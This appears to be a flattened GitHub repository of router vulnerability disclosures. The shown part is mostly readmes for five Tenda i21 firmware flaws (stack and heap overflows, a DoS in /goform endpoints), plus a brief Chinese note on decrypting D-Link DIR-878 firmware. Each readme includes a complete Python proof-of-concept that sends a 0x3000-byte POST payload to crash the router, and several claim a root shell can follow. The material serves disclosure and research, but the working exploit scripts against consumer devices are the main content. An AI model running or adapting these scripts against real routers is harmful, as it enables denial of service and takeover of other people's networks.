├── README.md ├── Tenda └── i21 │ ├── formAddSysLogRule │ ├── imgs │ │ ├── 1.png │ │ ├── 2.png │ │ └── readme.md │ └── readme.md │ ├── formSetDiagnoseInfo │ ├── imgs │ │ ├── 1.png │ │ ├── 2.png │ │ └── readme.md │ └── readme.md │ ├── formSetSnmpInfo │ ├── imgs │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ └── readme.md │ └── readme.md │ ├── formSetSysPwd │ ├── imgs │ │ ├── 1.png │ │ ├── 2.png │ │ └── readme.md │ └── readme.md │ ├── formSetUplinkInfo │ ├── imgs │ │ ├── 1.png │ │ ├── 2.png │ │ └── readme.md │ └── readme.md │ └── readme.md ├── dlink └── 878_decrypt │ ├── DIR878A1_FW104B05_Middle_FW_Unencrypt.bin │ ├── DIR878A1_FW104B05_Middleware.bin │ ├── decrypt dlink based dir878 zh.md │ └── images │ └── 01.png ├── tenda_ac6 ├── addWifiMacFilter_deviceId │ ├── addWifiMacFilter_deviceId.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── addWifiMacFilter_deviceMac │ ├── addWifiMacFilter_derviceMac.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formSetCfm │ ├── formSetCfm.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ └── 04.png ├── formSetClientState_deviceId │ ├── formSetClientState_deviceId.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formSetClientState_limitSpeed │ ├── formSetClientState_limitSpeed.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formSetClientState_limitSpeedUp │ ├── formSetClientState_limitSpeed.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formSetDeviceName │ ├── formSetDeviceName.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ └── 04.png ├── formSetFirewallCfg │ ├── formSetFirewallCfg.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formSetMacFilterCfg │ ├── formSetMacFilterCfg.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ ├── 04.png │ │ ├── 05.png │ │ ├── 06.png │ │ └── 07.png ├── formSetPPTPServer_endIp │ ├── formSetPPTPServer_endIp.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formSetPPTPServer_startIp │ ├── formSetPPTPServer_startIp.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formSetQosBand │ ├── formSetQosBand.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ └── 04.png ├── formSetSpeedWan │ ├── formSetSpeedWan.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formSetVirtualSer │ ├── formSetVirtualSer.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ └── 04.png ├── form_fast_setting_wifi_set_ssid │ ├── form_fast_setting_wifi_set_ssid.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── form_fast_setting_wifi_set_timeZone │ ├── form_fast_setting_wifi_set_timeZone.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── fromAddressNat │ ├── fromAddressNat.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── fromNatStaticSetting │ ├── fromNatStaticSetting_page.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── fromSetIpMacBind │ ├── fromSetIpMacBind.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ └── 04.png ├── fromSetSysTime │ ├── fromSetSysTime.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── fromSetWirelessRepeat │ ├── fromSetWirelessRepeat.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── saveParentControlInfo_deviceId │ ├── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png │ └── saveParentControlInfo_deviceid.md ├── saveParentControlInfo_time │ ├── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png │ └── saveParentControlInfo_time.md ├── saveParentControlInfo_urls │ ├── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png │ └── saveParentControlInfo_urls.md ├── setSchedWifi_schedEndTime │ ├── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png │ └── setSchedWifi_schedEndTime.md ├── setSchedWifi_schedStartTime │ ├── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png │ └── setSchedWifi_schedStartTime.md └── setSmartPowerManagement │ ├── images │ ├── 01.png │ ├── 02.png │ └── 03.png │ └── setSmartPowerManagement.md ├── tenda_ac6v1.0_vuln ├── Tenda AC6V1.0 V15.03.05.19 Stack overflow vulnerability.md └── images │ ├── 01.png │ ├── 02.png │ ├── 04.png │ ├── 05.png │ ├── 06.png │ └── 3.png ├── tenda_f1203 ├── GetParentControlInfo │ ├── GetParentControlInfo.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── addWifiMacFilter_deviceId │ ├── addWifiMacFilter_deviceId.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── addWifiMacFilter_deviceMac │ ├── addWifiMacFilter_deviceMac.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formSetClientState_deviceId │ ├── formSetClientState_deviceId.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formSetClientState_limitSpeed │ ├── formSetClientState_limitSpeed.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formSetClientState_limitSpeedUp │ ├── formSetClientState_limitSpeedUp.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formSetSpeedWan │ ├── formSetSpeedWan.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formWifiBasicSet_security _5g │ ├── formWifiBasicSet_security_5g.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formWifiBasicSet_security │ ├── formWifiBasicSet_security.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formWriteFacMac │ ├── formWriteFacMac.md │ └── images │ │ ├── 01.png │ │ └── 02.png ├── form_fast_setting_wifi_set │ ├── form_fast_setting_wifi_set.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formexeCommand │ ├── formexeCommand.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── fromAddressNat_entrys │ ├── fromAddressNat_entrys.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── fromAddressNat_mitInterface │ ├── fromAddressNat_mitInterface.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── fromAddressNat_page │ ├── fromAddressNat_page.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── fromDhcpListClient │ ├── fromDhcpListClient.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── fromNatStaticSetting │ ├── fromNatStaticSetting.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── fromRouteStatic │ ├── fromRouteStatic.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── fromVirtualSer │ ├── fromVirtualSer.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── saveParentControlInfo_deviceId │ ├── images │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ └── 04.png │ └── saveParentControlInfo_deviceId.md ├── saveParentControlInfo_time │ ├── images │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ └── 04.png │ └── saveParentControlInfo_time.md └── saveParentControlInfo_urls │ ├── images │ ├── 01.png │ ├── 02.png │ ├── 03.png │ └── 04.png │ └── saveParentControlInfo_urls.md ├── tenda_i22 ├── firmware │ └── US_i22V1.0BR_V1.0.0.3(4687)_CN_TDC01.zip ├── formSetAppFilterRule │ ├── formSetAppFilterRule.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ └── 04.png ├── formSetAutoPing_ping2 │ ├── formSetAutoPing_ping2.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formSetCfm │ ├── formWifiMacFilterSet.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ └── 04.png ├── formWifiMacFilterSet │ ├── formWifiMacFilterSet.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formWx3AuthorizeSet │ ├── formWx3AuthorizeSet.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formwrlSSIDget │ ├── formWifiMacFilterGet.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── formwrlSSIDset │ ├── formwrlSSIDset.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ └── 03.png ├── fromSysToolReboot │ ├── fromSysToolReboot.md │ └── images │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ └── 04.png └── fromSysToolRestoreSet │ ├── fromSysToolRestoreSet.md │ └── images │ ├── 01.png │ ├── 02.png │ ├── 03.png │ └── 04.png ├── totolink_ca300-poe ├── NTPSyncWithHost │ ├── NTPSyncWithHost.md │ └── images │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ ├── 4.png │ │ └── 5.png ├── firmware │ └── TOTOLINK_C8B810A-1E_NA_AP0155_QCA9531_SPI_16M128M_V6.2c.884_B20180522_ALL.web ├── root_hard_code │ ├── images │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ └── 4.png │ └── root_hard_code.md ├── setNetworkDiag_NetDiagHost │ ├── images │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ ├── 4.png │ │ ├── 5.png │ │ ├── 6.png │ │ └── 7.png │ └── setNetworkDiag_NetDiagHost.md ├── setNetworkDiag_NetDiagPingNum │ ├── images │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ ├── 5.png │ │ ├── 6.png │ │ └── 7.png │ └── setNetworkDiag_NetDiagPingNum.md ├── setNetworkDiag_NetDiagPingSize │ ├── images │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ ├── 5.png │ │ ├── 6.png │ │ └── 7.png │ └── setNetworkDiag_NetDiagPingSize.md ├── setNetworkDiag_NetDiagPingTimeOut │ ├── images │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ ├── 5.png │ │ ├── 6.png │ │ └── 7.png │ └── setNetworkDiag_NetDiagPingTimeOut.md ├── setNetworkDiag_NetDiagTracertHop │ ├── images │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ ├── 5.png │ │ ├── 6.png │ │ ├── 7.png │ │ └── 8.png │ └── setNetworkDiag_NetDiagTracertHop.md ├── setRebootScheCfg_hour │ ├── images │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ ├── 4.png │ │ └── 5.png │ └── setRebootScheCfg_hour.md ├── setRebootScheCfg_minute │ ├── images │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ ├── 4.png │ │ └── 5.png │ └── setRebootScheCfg_minute.md ├── setUnloadUserData │ ├── images │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ ├── 4.png │ │ └── 5.png │ └── setUnloadUserData.md ├── setUploadUserData │ ├── images │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ ├── 4.png │ │ └── 5.png │ └── setUploadUserData.md └── telnet_hard_code │ ├── images │ ├── 1.png │ ├── 2.png │ └── 3.png │ └── telnet_hard_code.md └── totolink_t8 ├── firmware └── TOTOLINK_C8195R-1C_T8_IP04455_8197F_SPI_16M128M_V4.1.5cu.741_B20210916_ALL.web ├── meshSlaveDlfw ├── images │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ └── 5.png └── meshSlaveDlfw.md ├── meshSlaveUpdate ├── images │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ └── 5.png └── meshSlaveUpdate.md ├── recvSlaveCloudCheckStatus_ip ├── images │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ └── 5.png └── recvSlaveCloudCheckStatus_ip.md ├── recvSlaveCloudCheckStatus_version ├── images │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ └── 5.png └── recvSlaveCloudCheckStatus.md ├── recvSlaveUpgstatus ├── images │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ └── 5.png └── recvSlaveUpgstatus.md ├── setUpgradeFW ├── images │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ └── 5.png └── setUpgradeFW.md ├── telnet_login ├── images │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── 5.png │ ├── 6.png │ └── 7.png └── telnet_login.md └── updateWifiInfo ├── images ├── 1.png ├── 2.png ├── 3.png ├── 4.png └── 5.png └── updateWifiInfo.md /README.md: -------------------------------------------------------------------------------- 1 | # CVE-vulns -------------------------------------------------------------------------------- /Tenda/i21/formAddSysLogRule/imgs/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formAddSysLogRule/imgs/1.png -------------------------------------------------------------------------------- /Tenda/i21/formAddSysLogRule/imgs/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formAddSysLogRule/imgs/2.png -------------------------------------------------------------------------------- /Tenda/i21/formAddSysLogRule/imgs/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Tenda/i21/formAddSysLogRule/readme.md: -------------------------------------------------------------------------------- 1 | # Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability 2 | 3 | ## Firmware information 4 | 5 | - Manufacturer's address:https://www.tenda.com.cn/ 6 | 7 | - Firmware download address:https://www.tenda.com.cn/download/detail-2982.html 8 | 9 | ## Affected version 10 | 11 | ![](imgs/1.png) 12 | 13 | ## Vulnerability details 14 | 15 | ![](imgs/2.png) 16 | 17 | In /goform/AddSysLogRule, when the input op is add, you can input logip, logport, len, and finally these three will be spliced into mib_value through sprintf. It is worth noting that these three do not check the size, resulting in stack overflow vulnerability 18 | 19 | ## Poc 20 | 21 | ```python 22 | import socket 23 | import os 24 | 25 | li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') 26 | ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m') 27 | 28 | ip = '192.168.0.1' 29 | port = 80 30 | 31 | r = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 32 | 33 | r.connect((ip, port)) 34 | 35 | rn = b'\r\n' 36 | 37 | p1 = b'a' * 0x3000 38 | p2 = b'op=add&logip=' + p1 39 | 40 | p3 = b"POST /goform/AddSysLogRule" + b" HTTP/1.1" + rn 41 | p3 += b"Host: 192.168.0.1" + rn 42 | p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn 43 | p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn 44 | p3 += b"Accept-Language: en-US,en;q=0.5" + rn 45 | p3 += b"Accept-Encoding: gzip, deflate" + rn 46 | p3 += b"Cookie: password=1111" + rn 47 | p3 += b"Connection: close" + rn 48 | p3 += b"Upgrade-Insecure-Requests: 1" + rn 49 | p3 += (b"Content-Length: %d" % len(p2)) +rn 50 | p3 += b'Content-Type: application/x-www-form-urlencoded'+rn 51 | p3 += rn 52 | p3 += p2 53 | 54 | r.send(p3) 55 | 56 | response = r.recv(4096) 57 | response = response.decode() 58 | li(response) 59 | ``` 60 | 61 | You can see the router crash, and finally we can write an exp to get a root shell 62 | -------------------------------------------------------------------------------- /Tenda/i21/formSetDiagnoseInfo/imgs/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetDiagnoseInfo/imgs/1.png -------------------------------------------------------------------------------- /Tenda/i21/formSetDiagnoseInfo/imgs/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetDiagnoseInfo/imgs/2.png -------------------------------------------------------------------------------- /Tenda/i21/formSetDiagnoseInfo/imgs/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Tenda/i21/formSetDiagnoseInfo/readme.md: -------------------------------------------------------------------------------- 1 | # Tenda i21 V1.0.0.14(4656) Heap overflow vulnerability 2 | 3 | ## Firmware information 4 | 5 | - Manufacturer's address:https://www.tenda.com.cn/ 6 | 7 | - Firmware download address:https://www.tenda.com.cn/download/detail-2982.html 8 | 9 | ## Affected version 10 | 11 | ![](imgs/1.png) 12 | 13 | ## Vulnerability details 14 | 15 | ![](imgs/2.png) 16 | 17 | In /goform/setDiagnoseInfo, a value of 0x50 is created, which will use strcpy to give the value after cmd + 5 to the heap. It is worth noting that the size is not checked, resulting in a heap overflow vulnerability 18 | 19 | ## Poc 20 | 21 | ```python 22 | import socket 23 | import os 24 | 25 | li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') 26 | ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m') 27 | 28 | ip = '192.168.0.1' 29 | port = 80 30 | 31 | r = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 32 | 33 | r.connect((ip, port)) 34 | 35 | rn = b'\r\n' 36 | 37 | p1 = b'a' * 0x3000 38 | p2 = b'cmd=' + p1 39 | 40 | p3 = b"POST /goform/setDiagnoseInfo" + b" HTTP/1.1" + rn 41 | p3 += b"Host: 192.168.0.1" + rn 42 | p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn 43 | p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn 44 | p3 += b"Accept-Language: en-US,en;q=0.5" + rn 45 | p3 += b"Accept-Encoding: gzip, deflate" + rn 46 | p3 += b"Cookie: password=1111" + rn 47 | p3 += b"Connection: close" + rn 48 | p3 += b"Upgrade-Insecure-Requests: 1" + rn 49 | p3 += (b"Content-Length: %d" % len(p2)) +rn 50 | p3 += b'Content-Type: application/x-www-form-urlencoded'+rn 51 | p3 += rn 52 | p3 += p2 53 | 54 | r.send(p3) 55 | 56 | response = r.recv(4096) 57 | response = response.decode() 58 | li(response) 59 | ``` 60 | 61 | You can see the router crash 62 | 63 | -------------------------------------------------------------------------------- /Tenda/i21/formSetSnmpInfo/imgs/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetSnmpInfo/imgs/1.png -------------------------------------------------------------------------------- /Tenda/i21/formSetSnmpInfo/imgs/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetSnmpInfo/imgs/2.png -------------------------------------------------------------------------------- /Tenda/i21/formSetSnmpInfo/imgs/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetSnmpInfo/imgs/3.png -------------------------------------------------------------------------------- /Tenda/i21/formSetSnmpInfo/imgs/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Tenda/i21/formSetSnmpInfo/readme.md: -------------------------------------------------------------------------------- 1 | # Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability 2 | 3 | ## Firmware information 4 | 5 | - Manufacturer's address:https://www.tenda.com.cn/ 6 | 7 | - Firmware download address:https://www.tenda.com.cn/download/detail-2982.html 8 | 9 | ## Affected version 10 | 11 | ![](imgs/1.png) 12 | 13 | ## Vulnerability details 14 | 15 | ![](imgs/2.png) 16 | 17 | ![](imgs/3.png) 18 | 19 | In /goform/setSnmpInfo, snmpEn is controlled by the user and will finally be spliced into parm by sprintf. It is worth noting that the stack overflow is caused by not checking the size 20 | 21 | ## Poc 22 | 23 | 24 | ```python 25 | import socket 26 | import os 27 | 28 | li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') 29 | ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m') 30 | 31 | ip = '192.168.0.1' 32 | port = 80 33 | 34 | r = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 35 | 36 | r.connect((ip, port)) 37 | 38 | rn = b'\r\n' 39 | 40 | p1 = b'a' * 0x3000 41 | p2 = b'snmpEn=' + p1 42 | 43 | p3 = b"POST /goform/setSnmpInfo" + b" HTTP/1.1" + rn 44 | p3 += b"Host: 192.168.0.1" + rn 45 | p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn 46 | p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn 47 | p3 += b"Accept-Language: en-US,en;q=0.5" + rn 48 | p3 += b"Accept-Encoding: gzip, deflate" + rn 49 | p3 += b"Cookie: password=1111" + rn 50 | p3 += b"Connection: close" + rn 51 | p3 += b"Upgrade-Insecure-Requests: 1" + rn 52 | p3 += (b"Content-Length: %d" % len(p2)) +rn 53 | p3 += b'Content-Type: application/x-www-form-urlencoded'+rn 54 | p3 += rn 55 | p3 += p2 56 | 57 | r.send(p3) 58 | 59 | response = r.recv(4096) 60 | response = response.decode() 61 | li(response) 62 | ``` 63 | 64 | You can see the router crash, and finally we can write an exp to get a root shell 65 | -------------------------------------------------------------------------------- /Tenda/i21/formSetSysPwd/imgs/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetSysPwd/imgs/1.png -------------------------------------------------------------------------------- /Tenda/i21/formSetSysPwd/imgs/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetSysPwd/imgs/2.png -------------------------------------------------------------------------------- /Tenda/i21/formSetSysPwd/imgs/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Tenda/i21/formSetSysPwd/readme.md: -------------------------------------------------------------------------------- 1 | # Tenda i21 V1.0.0.14(4656) Dos vulnerability 2 | 3 | ## Firmware information 4 | 5 | - Manufacturer's address:https://www.tenda.com.cn/ 6 | 7 | - Firmware download address:https://www.tenda.com.cn/download/detail-2982.html 8 | 9 | ## Affected version 10 | 11 | ![](imgs/1.png) 12 | 13 | ## Vulnerability details 14 | 15 | ![](imgs/2.png) 16 | 17 | In /goform/setSysPwd, when action is set to admin, the value of oldPwd will be base64 encoded and then passed to v3, and then v3 will be sent to encode_pwd by strcpy. It is worth noting that the stack overflow vulnerability is caused by not checking the size. 18 | 19 | ## Poc 20 | 21 | 22 | ```python 23 | import socket 24 | import os 25 | 26 | li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') 27 | ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m') 28 | 29 | ip = '192.168.0.1' 30 | port = 80 31 | 32 | r = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 33 | 34 | r.connect((ip, port)) 35 | 36 | rn = b'\r\n' 37 | 38 | p1 = b'a' * 0x3000 39 | p2 = b'action=admin&oldPwd=' + p1 40 | 41 | p3 = b"POST /goform/setSysPwd" + b" HTTP/1.1" + rn 42 | p3 += b"Host: 192.168.0.1" + rn 43 | p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn 44 | p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn 45 | p3 += b"Accept-Language: en-US,en;q=0.5" + rn 46 | p3 += b"Accept-Encoding: gzip, deflate" + rn 47 | p3 += b"Cookie: password=1111" + rn 48 | p3 += b"Connection: close" + rn 49 | p3 += b"Upgrade-Insecure-Requests: 1" + rn 50 | p3 += (b"Content-Length: %d" % len(p2)) +rn 51 | p3 += b'Content-Type: application/x-www-form-urlencoded'+rn 52 | p3 += rn 53 | p3 += p2 54 | 55 | r.send(p3) 56 | 57 | response = r.recv(4096) 58 | response = response.decode() 59 | li(response) 60 | ``` 61 | 62 | You can see the router crash 63 | -------------------------------------------------------------------------------- /Tenda/i21/formSetUplinkInfo/imgs/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetUplinkInfo/imgs/1.png -------------------------------------------------------------------------------- /Tenda/i21/formSetUplinkInfo/imgs/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/Tenda/i21/formSetUplinkInfo/imgs/2.png -------------------------------------------------------------------------------- /Tenda/i21/formSetUplinkInfo/imgs/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Tenda/i21/formSetUplinkInfo/readme.md: -------------------------------------------------------------------------------- 1 | # Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability 2 | 3 | ## Firmware information 4 | 5 | - Manufacturer's address:https://www.tenda.com.cn/ 6 | 7 | - Firmware download address:https://www.tenda.com.cn/download/detail-2982.html 8 | 9 | ## Affected version 10 | 11 | ![](imgs/1.png) 12 | 13 | ## Vulnerability details 14 | 15 | ![](imgs/2.png) 16 | 17 | In /goform/setUplinkInfo, pingHostIp1 is controlled by the user and will be spliced into auto_ping_ip by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability 18 | 19 | ## Poc 20 | 21 | ```python 22 | import socket 23 | import os 24 | 25 | li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') 26 | ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m') 27 | 28 | ip = '192.168.0.1' 29 | port = 80 30 | 31 | r = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 32 | 33 | r.connect((ip, port)) 34 | 35 | rn = b'\r\n' 36 | 37 | p1 = b'a' * 0x3000 38 | p2 = b'upLinkEn=true&pingHostIp1=' + p1 39 | 40 | p3 = b"POST /goform/setUplinkInfo" + b" HTTP/1.1" + rn 41 | p3 += b"Host: 192.168.0.1" + rn 42 | p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn 43 | p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn 44 | p3 += b"Accept-Language: en-US,en;q=0.5" + rn 45 | p3 += b"Accept-Encoding: gzip, deflate" + rn 46 | p3 += b"Cookie: password=1111" + rn 47 | p3 += b"Connection: close" + rn 48 | p3 += b"Upgrade-Insecure-Requests: 1" + rn 49 | p3 += (b"Content-Length: %d" % len(p2)) +rn 50 | p3 += b'Content-Type: application/x-www-form-urlencoded'+rn 51 | p3 += rn 52 | p3 += p2 53 | 54 | r.send(p3) 55 | 56 | response = r.recv(4096) 57 | response = response.decode() 58 | li(response) 59 | ``` 60 | 61 | You can see the router crash, and finally we can write an exp to get a root shell 62 | 63 | 64 | -------------------------------------------------------------------------------- /Tenda/i21/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /dlink/878_decrypt/DIR878A1_FW104B05_Middle_FW_Unencrypt.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/dlink/878_decrypt/DIR878A1_FW104B05_Middle_FW_Unencrypt.bin -------------------------------------------------------------------------------- /dlink/878_decrypt/DIR878A1_FW104B05_Middleware.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/dlink/878_decrypt/DIR878A1_FW104B05_Middleware.bin -------------------------------------------------------------------------------- /dlink/878_decrypt/decrypt dlink based dir878 zh.md: -------------------------------------------------------------------------------- 1 | # 基于DIR-878解密部分D-link加密固件 2 | 3 | ## 前言 4 | 5 | dir-878的固件是加密的,但是找到了一个未加密的中间固件 6 | 7 | http://files.dlink.com.au/Products/DIR-878/REV_A/Firmware/DIR-878_FW1.04B05/ 8 | 9 | ![image-20221130182817661](images/01.png) 10 | 11 | 此固件包含一个mipsel架构的解密镜像程序,此程序还可以解密多个相同加密算法的固件 12 | 13 | -------------------------------------------------------------------------------- /dlink/878_decrypt/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/dlink/878_decrypt/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/addWifiMacFilter_deviceId/images/01.png: -------------------------------------------------------------------------------- 